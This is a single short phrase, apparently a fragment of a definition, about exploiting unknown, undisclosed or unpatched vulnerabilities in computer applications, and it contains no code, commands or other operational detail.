exploit unknown, undisclosed or unpatched computer application vulnerabilities